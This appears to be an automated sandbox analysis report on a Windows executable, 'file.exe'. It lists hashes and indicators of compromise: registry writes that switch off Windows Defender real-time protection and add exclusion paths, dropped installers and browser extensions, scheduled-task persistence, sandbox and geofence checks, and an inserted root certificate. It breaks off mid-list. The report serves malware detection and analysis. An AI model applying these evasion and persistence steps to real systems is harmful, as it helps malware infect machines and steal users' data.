Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
17/10/2022, 19:50
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
a35dbba262db9ae584fbdec0e6323cac
-
SHA1
9d62d9517e1e6542a9f57bcd10dcea0eaf10723d
-
SHA256
87f63e1fac30814b0d9fe2137da82c3aafc2c29e217596d47dca5addd6e0ecd7
-
SHA512
22d31687685d0995c2b5bb1f4a196dceba3e4ef3c3d274179504ec99d70fb8c2646664d8b080b4e26abde4180fa12ee4ee966988f8f0a78965e41789f8c2f53f
-
SSDEEP
196608:91OjAn0WZazjJgyd5FL9355pry0FTqIW8semyMdOzO1kh:3OnW0nJv95/pe0vfgtE
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uGQUxmMVndUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sVKkdmDjU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uGQUxmMVndUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZbDVoFOXNENU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\qZroPUUiMzyEdOVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oEaTcchOPpGVC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oEaTcchOPpGVC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZbDVoFOXNENU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\qZroPUUiMzyEdOVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sVKkdmDjU = "0" reg.exe -
Executes dropped EXE 4 IoCs
pid Process 1848 Install.exe 2044 Install.exe 536 WKxmouy.exe 1860 xHZNvQg.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation xHZNvQg.exe -
Loads dropped DLL 12 IoCs
pid Process 1088 file.exe 1848 Install.exe 1848 Install.exe 1848 Install.exe 1848 Install.exe 2044 Install.exe 2044 Install.exe 2044 Install.exe 1936 rundll32.exe 1936 rundll32.exe 1936 rundll32.exe 1936 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json xHZNvQg.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json xHZNvQg.exe -
Drops file in System32 directory 22 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xHZNvQg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xHZNvQg.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WKxmouy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 xHZNvQg.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WKxmouy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 xHZNvQg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WKxmouy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 xHZNvQg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 xHZNvQg.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\oEaTcchOPpGVC\fwukPuz.dll xHZNvQg.exe File created C:\Program Files (x86)\sVKkdmDjU\BoLWlc.dll xHZNvQg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xHZNvQg.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xHZNvQg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xHZNvQg.exe File created C:\Program Files (x86)\ZbDVoFOXNENU2\sBMooLMWDlzch.dll xHZNvQg.exe File created C:\Program Files (x86)\ZbDVoFOXNENU2\ADlLMVt.xml xHZNvQg.exe File created C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\GnLhcfs.dll xHZNvQg.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xHZNvQg.exe File created C:\Program Files (x86)\sVKkdmDjU\PrunerE.xml xHZNvQg.exe File created C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\gYYCjto.xml xHZNvQg.exe File created C:\Program Files (x86)\oEaTcchOPpGVC\JjpmzGh.xml xHZNvQg.exe File created C:\Program Files (x86)\uGQUxmMVndUn\UITdtaG.dll xHZNvQg.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\CXoLteMjLNFiDzwgz.job schtasks.exe File created C:\Windows\Tasks\qryHMmQcYEgLlBC.job schtasks.exe File created C:\Windows\Tasks\PEfpnAabivfJAexgy.job schtasks.exe File created C:\Windows\Tasks\bNmmFmDfYxkEbHwDyL.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 432 schtasks.exe 1980 schtasks.exe 2032 schtasks.exe 1184 schtasks.exe 1052 schtasks.exe 1120 schtasks.exe 1104 schtasks.exe 548 schtasks.exe 1056 schtasks.exe 592 schtasks.exe 1252 schtasks.exe 1992 schtasks.exe 1332 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs xHZNvQg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\WpadNetworkName = "Network 3" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates xHZNvQg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust xHZNvQg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings xHZNvQg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-99-72-cf-ac-0a\WpadDecisionTime = 10648ab372e2d801 xHZNvQg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\1e-99-72-cf-ac-0a xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates xHZNvQg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\WpadDecisionTime = 10648ab372e2d801 xHZNvQg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-99-72-cf-ac-0a\WpadDecisionReason = "1" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA xHZNvQg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\WpadDecisionReason = "1" xHZNvQg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople xHZNvQg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs xHZNvQg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates xHZNvQg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings xHZNvQg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 xHZNvQg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde xHZNvQg.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1920 powershell.EXE 1920 powershell.EXE 1920 powershell.EXE 2028 powershell.EXE 2028 powershell.EXE 2028 powershell.EXE 1580 powershell.EXE 1580 powershell.EXE 1580 powershell.EXE 268 powershell.EXE 268 powershell.EXE 268 powershell.EXE 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe 1860 xHZNvQg.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1920 powershell.EXE Token: SeDebugPrivilege 2028 powershell.EXE Token: SeDebugPrivilege 1580 powershell.EXE Token: SeDebugPrivilege 268 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1088 wrote to memory of 1848 1088 file.exe 28 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 1848 wrote to memory of 2044 1848 Install.exe 29 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 1136 2044 Install.exe 31 PID 2044 wrote to memory of 268 2044 Install.exe 33 PID 2044 wrote to memory of 268 2044 Install.exe 33 PID 2044 wrote to memory of 268 2044 Install.exe 33 PID 2044 wrote to memory of 268 2044 Install.exe 